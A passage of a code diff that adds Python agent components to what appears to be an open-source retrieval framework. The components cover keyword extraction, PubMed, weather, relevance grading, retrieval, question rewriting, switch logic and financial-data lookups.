- keyword:
|
||||
""" % self.top_n
|
||||
return self.prompt
|
||||
|
||||
|
||||
class KeywordExtract(Generate, ABC):
|
||||
component_name = "KeywordExtract"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
q = ""
|
||||
for r, c in self._canvas.history[::-1]:
|
||||
if r == "user":
|
||||
q += c
|
||||
break
|
||||
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
|
||||
self._param.gen_conf())
|
||||
|
||||
ans = re.sub(r".*keyword:", "", ans).strip()
|
||||
if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::")
|
||||
return KeywordExtract.be_output(ans)
|
||||
53
agent/component/message.py
Normal file
53
agent/component/message.py
Normal file
@ -0,0 +1,53 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import random
|
||||
from abc import ABC
|
||||
from functools import partial
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class MessageParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Message component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.messages = []
|
||||
|
||||
def check(self):
|
||||
self.check_empty(self.messages, "[Message]")
|
||||
return True
|
||||
|
||||
|
||||
class Message(ComponentBase, ABC):
|
||||
component_name = "Message"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if kwargs.get("stream"):
|
||||
return partial(self.stream_output)
|
||||
|
||||
return Message.be_output(random.choice(self._param.messages))
|
||||
|
||||
def stream_output(self):
|
||||
res = None
|
||||
if self._param.messages:
|
||||
res = {"content": random.choice(self._param.messages)}
|
||||
yield res
|
||||
|
||||
self.set_output(res)
|
||||
|
||||
|
||||
69
agent/component/pubmed.py
Normal file
69
agent/component/pubmed.py
Normal file
@ -0,0 +1,69 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from Bio import Entrez
|
||||
import re
|
||||
import pandas as pd
|
||||
import xml.etree.ElementTree as ET
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class PubMedParam(ComponentParamBase):
|
||||
"""
|
||||
Define the PubMed component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 5
|
||||
self.email = "A.N.Other@example.com"
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
|
||||
|
||||
class PubMed(ComponentBase, ABC):
|
||||
component_name = "PubMed"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return PubMed.be_output("")
|
||||
|
||||
try:
|
||||
Entrez.email = self._param.email
|
||||
pubmedids = Entrez.read(Entrez.esearch(db='pubmed', retmax=self._param.top_n, term=ans))['IdList']
|
||||
pubmedcnt = ET.fromstring(re.sub(r'<(/?)b>|<(/?)i>', '', Entrez.efetch(db='pubmed', id=",".join(pubmedids),
|
||||
retmode="xml").read().decode(
|
||||
"utf-8")))
|
||||
pubmed_res = [{"content": 'Title:' + child.find("MedlineCitation").find("Article").find(
|
||||
"ArticleTitle").text + '\nUrl:<a href=" https://pubmed.ncbi.nlm.nih.gov/' + child.find(
|
||||
"MedlineCitation").find("PMID").text + '">' + '</a>\n' + 'Abstract:' + (
|
||||
child.find("MedlineCitation").find("Article").find("Abstract").find(
|
||||
"AbstractText").text if child.find("MedlineCitation").find(
|
||||
"Article").find("Abstract") else "No abstract available")} for child in
|
||||
pubmedcnt.findall("PubmedArticle")]
|
||||
except Exception as e:
|
||||
return PubMed.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not pubmed_res:
|
||||
return PubMed.be_output("")
|
||||
|
||||
df = pd.DataFrame(pubmed_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
111
agent/component/qweather.py
Normal file
111
agent/component/qweather.py
Normal file
@ -0,0 +1,111 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import pandas as pd
|
||||
import requests
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class QWeatherParam(ComponentParamBase):
|
||||
"""
|
||||
Define the QWeather component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.web_apikey = "xxx"
|
||||
self.lang = "zh"
|
||||
self.type = "weather"
|
||||
self.user_type = 'free'
|
||||
self.error_code = {
|
||||
"204": "The request was successful, but the region you are querying does not have the data you need at this time.",
|
||||
"400": "Request error, may contain incorrect request parameters or missing mandatory request parameters.",
|
||||
"401": "Authentication fails, possibly using the wrong KEY, wrong digital signature, wrong type of KEY (e.g. using the SDK's KEY to access the Web API).",
|
||||
"402": "Exceeded the number of accesses or the balance is not enough to support continued access to the service, you can recharge, upgrade the accesses or wait for the accesses to be reset.",
|
||||
"403": "No access, may be the binding PackageName, BundleID, domain IP address is inconsistent, or the data that requires additional payment.",
|
||||
"404": "The queried data or region does not exist.",
|
||||
"429": "Exceeded the limited QPM (number of accesses per minute), please refer to the QPM description",
|
||||
"500": "No response or timeout, interface service abnormality please contact us"
|
||||
}
|
||||
# Weather
|
||||
self.time_period = 'now'
|
||||
|
||||
def check(self):
|
||||
self.check_empty(self.web_apikey, "BaiduFanyi APPID")
|
||||
self.check_valid_value(self.type, "Type", ["weather", "indices", "airquality"])
|
||||
self.check_valid_value(self.user_type, "Free subscription or paid subscription", ["free", "paid"])
|
||||
self.check_valid_value(self.lang, "Use language",
|
||||
['zh', 'zh-hant', 'en', 'de', 'es', 'fr', 'it', 'ja', 'ko', 'ru', 'hi', 'th', 'ar', 'pt',
|
||||
'bn', 'ms', 'nl', 'el', 'la', 'sv', 'id', 'pl', 'tr', 'cs', 'et', 'vi', 'fil', 'fi',
|
||||
'he', 'is', 'nb'])
|
||||
self.check_valid_value(self.time_period, "Time period", ['now', '3d', '7d', '10d', '15d', '30d'])
|
||||
|
||||
|
||||
class QWeather(ComponentBase, ABC):
|
||||
component_name = "QWeather"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = "".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return QWeather.be_output("")
|
||||
|
||||
try:
|
||||
response = requests.get(
|
||||
url="https://geoapi.qweather.com/v2/city/lookup?location=" + ans + "&key=" + self._param.web_apikey).json()
|
||||
if response["code"] == "200":
|
||||
location_id = response["location"][0]["id"]
|
||||
else:
|
||||
return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
|
||||
|
||||
base_url = "https://api.qweather.com/v7/" if self._param.user_type == 'paid' else "https://devapi.qweather.com/v7/"
|
||||
|
||||
if self._param.type == "weather":
|
||||
url = base_url + "weather/" + self._param.time_period + "?location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
|
||||
response = requests.get(url=url).json()
|
||||
if response["code"] == "200":
|
||||
if self._param.time_period == "now":
|
||||
return QWeather.be_output(str(response["now"]))
|
||||
else:
|
||||
qweather_res = [{"content": str(i) + "\n"} for i in response["daily"]]
|
||||
if not qweather_res:
|
||||
return QWeather.be_output("")
|
||||
|
||||
df = pd.DataFrame(qweather_res)
|
||||
return df
|
||||
else:
|
||||
return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
|
||||
|
||||
elif self._param.type == "indices":
|
||||
url = base_url + "indices/1d?type=0&location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
|
||||
response = requests.get(url=url).json()
|
||||
if response["code"] == "200":
|
||||
indices_res = response["daily"][0]["date"] + "\n" + "\n".join(
|
||||
[i["name"] + ": " + i["category"] + ", " + i["text"] for i in response["daily"]])
|
||||
return QWeather.be_output(indices_res)
|
||||
|
||||
else:
|
||||
return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
|
||||
|
||||
elif self._param.type == "airquality":
|
||||
url = base_url + "air/now?location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
|
||||
response = requests.get(url=url).json()
|
||||
if response["code"] == "200":
|
||||
return QWeather.be_output(str(response["now"]))
|
||||
else:
|
||||
return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
|
||||
except Exception as e:
|
||||
return QWeather.be_output("**Error**" + str(e))
|
||||
80
agent/component/relevant.py
Normal file
80
agent/component/relevant.py
Normal file
@ -0,0 +1,80 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from agent.component import GenerateParam, Generate
|
||||
from rag.utils import num_tokens_from_string, encoder
|
||||
|
||||
|
||||
class RelevantParam(GenerateParam):
|
||||
|
||||
"""
|
||||
Define the Relevant component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.prompt = ""
|
||||
self.yes = ""
|
||||
self.no = ""
|
||||
|
||||
def check(self):
|
||||
super().check()
|
||||
self.check_empty(self.yes, "[Relevant] 'Yes'")
|
||||
self.check_empty(self.no, "[Relevant] 'No'")
|
||||
|
||||
def get_prompt(self):
|
||||
self.prompt = """
|
||||
You are a grader assessing relevance of a retrieved document to a user question.
|
||||
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
|
||||
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
|
||||
Give a binary score 'yes' or 'no' score to indicate whether the document is relevant to the question.
|
||||
No other words needed except 'yes' or 'no'.
|
||||
"""
|
||||
return self.prompt
|
||||
|
||||
|
||||
class Relevant(Generate, ABC):
|
||||
component_name = "Relevant"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
q = ""
|
||||
for r, c in self._canvas.history[::-1]:
|
||||
if r == "user":
|
||||
q = c
|
||||
break
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Relevant.be_output(self._param.no)
|
||||
ans = "Documents: \n" + ans
|
||||
ans = f"Question: {q}\n" + ans
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
|
||||
if num_tokens_from_string(ans) >= chat_mdl.max_length - 4:
|
||||
ans = encoder.decode(encoder.encode(ans)[:chat_mdl.max_length - 4])
|
||||
|
||||
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": ans}],
|
||||
self._param.gen_conf())
|
||||
|
||||
print(ans, ":::::::::::::::::::::::::::::::::")
|
||||
if ans.lower().find("yes") >= 0:
|
||||
return Relevant.be_output(self._param.yes)
|
||||
if ans.lower().find("no") >= 0:
|
||||
return Relevant.be_output(self._param.no)
|
||||
assert False, f"Relevant component got: {ans}"
|
||||
|
||||
|
||||
89
agent/component/retrieval.py
Normal file
89
agent/component/retrieval.py
Normal file
@ -0,0 +1,89 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.settings import retrievaler
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class RetrievalParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Retrieval component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.similarity_threshold = 0.2
|
||||
self.keywords_similarity_weight = 0.5
|
||||
self.top_n = 8
|
||||
self.top_k = 1024
|
||||
self.kb_ids = []
|
||||
self.rerank_id = ""
|
||||
self.empty_response = ""
|
||||
|
||||
def check(self):
|
||||
self.check_decimal_float(self.similarity_threshold, "[Retrieval] Similarity threshold")
|
||||
self.check_decimal_float(self.keywords_similarity_weight, "[Retrieval] Keywords similarity weight")
|
||||
self.check_positive_number(self.top_n, "[Retrieval] Top N")
|
||||
self.check_empty(self.kb_ids, "[Retrieval] Knowledge bases")
|
||||
|
||||
|
||||
class Retrieval(ComponentBase, ABC):
|
||||
component_name = "Retrieval"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
query = []
|
||||
for role, cnt in history[::-1][:self._param.message_history_window_size]:
|
||||
if role != "user":continue
|
||||
query.append(cnt)
|
||||
# query = "\n".join(query)
|
||||
query = query[0]
|
||||
kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
|
||||
if not kbs:
|
||||
raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
|
||||
|
||||
embd_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING, embd_nms[0])
|
||||
self._canvas.set_embedding_model(embd_nms[0])
|
||||
|
||||
rerank_mdl = None
|
||||
if self._param.rerank_id:
|
||||
rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)
|
||||
|
||||
kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
|
||||
1, self._param.top_n,
|
||||
self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
|
||||
aggs=False, rerank_mdl=rerank_mdl)
|
||||
|
||||
if not kbinfos["chunks"]:
|
||||
df = Retrieval.be_output("")
|
||||
if self._param.empty_response and self._param.empty_response.strip():
|
||||
df["empty_response"] = self._param.empty_response
|
||||
return df
|
||||
|
||||
df = pd.DataFrame(kbinfos["chunks"])
|
||||
df["content"] = df["content_with_weight"]
|
||||
del df["content_with_weight"]
|
||||
print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", query, df)
|
||||
return df
|
||||
|
||||
|
||||
72
agent/component/rewrite.py
Normal file
72
agent/component/rewrite.py
Normal file
@ -0,0 +1,72 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from agent.component import GenerateParam, Generate
|
||||
|
||||
|
||||
class RewriteQuestionParam(GenerateParam):
|
||||
|
||||
"""
|
||||
Define the QuestionRewrite component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.temperature = 0.9
|
||||
self.prompt = ""
|
||||
self.loop = 1
|
||||
|
||||
def check(self):
|
||||
super().check()
|
||||
|
||||
def get_prompt(self):
|
||||
self.prompt = """
|
||||
You are an expert at query expansion to generate a paraphrasing of a question.
|
||||
I can't retrieval relevant information from the knowledge base by using user's question directly.
|
||||
You need to expand or paraphrase user's question by multiple ways such as using synonyms words/phrase,
|
||||
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
|
||||
changing the way of expression, translating the original question into another language (English/Chinese), etc.
|
||||
And return 5 versions of question and one is from translation.
|
||||
Just list the question. No other words are needed.
|
||||
"""
|
||||
return self.prompt
|
||||
|
||||
|
||||
class RewriteQuestion(Generate, ABC):
|
||||
component_name = "RewriteQuestion"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if not hasattr(self, "_loop"):
|
||||
setattr(self, "_loop", 0)
|
||||
if self._loop >= self._param.loop:
|
||||
self._loop = 0
|
||||
raise Exception("Sorry! Nothing relevant found.")
|
||||
self._loop += 1
|
||||
q = "Question: "
|
||||
for r, c in self._canvas.history[::-1]:
|
||||
if r == "user":
|
||||
q += c
|
||||
break
|
||||
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
|
||||
self._param.gen_conf())
|
||||
|
||||
print(ans, ":::::::::::::::::::::::::::::::::")
|
||||
return RewriteQuestion.be_output(ans)
|
||||
|
||||
|
||||
125
agent/component/switch.py
Normal file
125
agent/component/switch.py
Normal file
@ -0,0 +1,125 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class SwitchParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Switch component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
"""
|
||||
{
|
||||
"logical_operator" : "and | or"
|
||||
"items" : [
|
||||
{"cpn_id": "categorize:0", "operator": "contains", "value": ""},
|
||||
{"cpn_id": "categorize:0", "operator": "contains", "value": ""},...],
|
||||
"to": ""
|
||||
}
|
||||
"""
|
||||
self.conditions = []
|
||||
self.end_cpn_id = "answer:0"
|
||||
self.operators = ['contains', 'not contains', 'start with', 'end with', 'empty', 'not empty', '=', '≠', '>',
|
||||
'<', '≥', '≤']
|
||||
|
||||
def check(self):
|
||||
self.check_empty(self.conditions, "[Switch] conditions")
|
||||
for cond in self.conditions:
|
||||
if not cond["to"]: raise ValueError(f"[Switch] 'To' can not be empty!")
|
||||
|
||||
|
||||
class Switch(ComponentBase, ABC):
|
||||
component_name = "Switch"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
for cond in self._param.conditions:
|
||||
|
||||
if len(cond["items"]) == 1:
|
||||
out = self._canvas.get_component(cond["items"][0]["cpn_id"])["obj"].output()[1]
|
||||
cpn_input = "" if "content" not in out.columns else " ".join(out["content"])
|
||||
if self.process_operator(cpn_input, cond["items"][0]["operator"], cond["items"][0]["value"]):
|
||||
return Switch.be_output(cond["to"])
|
||||
continue
|
||||
|
||||
if cond["logical_operator"] == "and":
|
||||
res = True
|
||||
for item in cond["items"]:
|
||||
out = self._canvas.get_component(item["cpn_id"])["obj"].output()[1]
|
||||
cpn_input = "" if "content" not in out.columns else " ".join(out["content"])
|
||||
if not self.process_operator(cpn_input, item["operator"], item["value"]):
|
||||
res = False
|
||||
break
|
||||
if res:
|
||||
return Switch.be_output(cond["to"])
|
||||
continue
|
||||
|
||||
res = False
|
||||
for item in cond["items"]:
|
||||
out = self._canvas.get_component(item["cpn_id"])["obj"].output()[1]
|
||||
cpn_input = "" if "content" not in out.columns else " ".join(out["content"])
|
||||
if self.process_operator(cpn_input, item["operator"], item["value"]):
|
||||
res = True
|
||||
break
|
||||
if res:
|
||||
return Switch.be_output(cond["to"])
|
||||
|
||||
return Switch.be_output(self._param.end_cpn_id)
|
||||
|
||||
def process_operator(self, input: str, operator: str, value: str) -> bool:
|
||||
if not isinstance(input, str) or not isinstance(value, str):
|
||||
raise ValueError('Invalid input or value type: string')
|
||||
|
||||
if operator == "contains":
|
||||
return True if value.lower() in input.lower() else False
|
||||
elif operator == "not contains":
|
||||
return True if value.lower() not in input.lower() else False
|
||||
elif operator == "start with":
|
||||
return True if input.lower().startswith(value.lower()) else False
|
||||
elif operator == "end with":
|
||||
return True if input.lower().endswith(value.lower()) else False
|
||||
elif operator == "empty":
|
||||
return True if not input else False
|
||||
elif operator == "not empty":
|
||||
return True if input else False
|
||||
elif operator == "=":
|
||||
return True if input == value else False
|
||||
elif operator == "≠":
|
||||
return True if input != value else False
|
||||
elif operator == ">":
|
||||
try:
|
||||
return True if float(input) > float(value) else False
|
||||
except Exception as e:
|
||||
return True if input > value else False
|
||||
elif operator == "<":
|
||||
try:
|
||||
return True if float(input) < float(value) else False
|
||||
except Exception as e:
|
||||
return True if input < value else False
|
||||
elif operator == "≥":
|
||||
try:
|
||||
return True if float(input) >= float(value) else False
|
||||
except Exception as e:
|
||||
return True if input >= value else False
|
||||
elif operator == "≤":
|
||||
try:
|
||||
return True if float(input) <= float(value) else False
|
||||
except Exception as e:
|
||||
return True if input <= value else False
|
||||
|
||||
raise ValueError('Not supported operator' + operator)
|
||||
72
agent/component/tushare.py
Normal file
72
agent/component/tushare.py
Normal file
@ -0,0 +1,72 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
from abc import ABC
|
||||
import pandas as pd
|
||||
import time
|
||||
import requests
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class TuShareParam(ComponentParamBase):
|
||||
"""
|
||||
Define the TuShare component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.token = "xxx"
|
||||
self.src = "eastmoney"
|
||||
self.start_date = "2024-01-01 09:00:00"
|
||||
self.end_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
|
||||
self.keyword = ""
|
||||
|
||||
def check(self):
|
||||
self.check_valid_value(self.src, "Quick News Source",
|
||||
["sina", "wallstreetcn", "10jqka", "eastmoney", "yuncaijing", "fenghuang", "jinrongjie"])
|
||||
|
||||
|
||||
class TuShare(ComponentBase, ABC):
|
||||
component_name = "TuShare"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = ",".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return TuShare.be_output("")
|
||||
|
||||
try:
|
||||
tus_res = []
|
||||
params = {
|
||||
"api_name": "news",
|
||||
"token": self._param.token,
|
||||
"params": {"src": self._param.src, "start_date": self._param.start_date,
|
||||
"end_date": self._param.end_date}
|
||||
}
|
||||
response = requests.post(url="http://api.tushare.pro", data=json.dumps(params).encode('utf-8'))
|
||||
response = response.json()
|
||||
if response['code'] != 0:
|
||||
return TuShare.be_output(response['msg'])
|
||||
df = pd.DataFrame(response['data']['items'])
|
||||
df.columns = response['data']['fields']
|
||||
tus_res.append({"content": (df[df['content'].str.contains(self._param.keyword, case=False)]).to_markdown()})
|
||||
except Exception as e:
|
||||
return TuShare.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not tus_res:
|
||||
return TuShare.be_output("")
|
||||
|
||||
return pd.DataFrame(tus_res)
|
||||
74
agent/component/wencai.py
Normal file
74
agent/component/wencai.py
Normal file
@ -0,0 +1,74 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import pandas as pd
|
||||
import pywencai
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class WenCaiParam(ComponentParamBase):
|
||||
"""
|
||||
Define the WenCai component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
self.query_type = "stock"
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_valid_value(self.query_type, "Query type",
|
||||
['stock', 'zhishu', 'fund', 'hkstock', 'usstock', 'threeboard', 'conbond', 'insurance',
|
||||
'futures', 'lccp',
|
||||
'foreign_exchange'])
|
||||
|
||||
|
||||
class WenCai(ComponentBase, ABC):
|
||||
component_name = "WenCai"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = ",".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return WenCai.be_output("")
|
||||
|
||||
try:
|
||||
wencai_res = []
|
||||
res = pywencai.get(query=ans, query_type=self._param.query_type, perpage=self._param.top_n)
|
||||
if isinstance(res, pd.DataFrame):
|
||||
wencai_res.append({"content": res.to_markdown()})
|
||||
if isinstance(res, dict):
|
||||
for item in res.items():
|
||||
if isinstance(item[1], list):
|
||||
wencai_res.append({"content": item[0] + "\n" + pd.DataFrame(item[1]).to_markdown()})
|
||||
continue
|
||||
if isinstance(item[1], str):
|
||||
wencai_res.append({"content": item[0] + "\n" + item[1]})
|
||||
continue
|
||||
if isinstance(item[1], dict):
|
||||
if "meta" in item[1].keys():
|
||||
continue
|
||||
wencai_res.append({"content": pd.DataFrame.from_dict(item[1], orient='index').to_markdown()})
|
||||
continue
|
||||
wencai_res.append({"content": item[0] + "\n" + str(item[1])})
|
||||
except Exception as e:
|
||||
return WenCai.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not wencai_res:
|
||||
return WenCai.be_output("")
|
||||
|
||||
return pd.DataFrame(wencai_res)
|
||||
69
agent/component/wikipedia.py
Normal file
69
agent/component/wikipedia.py
Normal file
@ -0,0 +1,69 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
